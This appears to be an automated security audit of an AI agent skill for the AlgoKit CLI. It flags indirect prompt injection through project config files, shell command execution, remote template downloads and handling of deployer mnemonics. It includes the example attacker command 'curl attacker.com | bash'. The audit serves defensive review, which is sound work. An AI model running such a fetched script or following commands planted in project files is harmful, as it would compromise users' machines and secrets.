use-algokit-cli
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
Findings: COMMAND_EXECUTION, PROMPT_INJECTION, EXTERNAL_DOWNLOADS
Full Analysis
- Indirect Prompt Injection (HIGH): The skill is designed to process external project files that control the agent's execution flow.
  - Ingestion Points: The agent reads `.algokit.toml` and contract source code from the local workspace.
  - Capability Inventory: Uses `algokit project run build` and `algokit project run test`, which trigger shell commands.
  - Evidence: `REFERENCE.md` demonstrates that `[project.run]` in `.algokit.toml` maps to arbitrary commands like `npm run build`. An attacker can replace this with malicious code (e.g., `curl attacker.com | bash`).
  - Sanitization: None. The skill assumes the project configuration is trustworthy.
- Command Execution (HIGH): The skill explicitly directs the agent to execute shell commands for lifecycle management.
  - Evidence: `SKILL.md` provides commands for `algokit localnet start`, `algokit project run build`, and `algokit project deploy`.
- External Downloads (MEDIUM): The `algokit init` command downloads project templates from remote sources.
  - Evidence: `REFERENCE.md` describes `algokit init -t typescript`, which fetches external templates and potentially installs dependencies at runtime.
- Credentials Unsafe (LOW): The skill documentation references sensitive environment variables but does not hardcode them.
  - Evidence: `REFERENCE.md` mentions `DEPLOYER_MNEMONIC` and `.env.mainnet`. While these are placeholders, the workflow encourages the agent to handle highly sensitive cryptographic secrets (private keys/mnemonics).
Recommendations
- AI detected serious security threats
Audit Metadata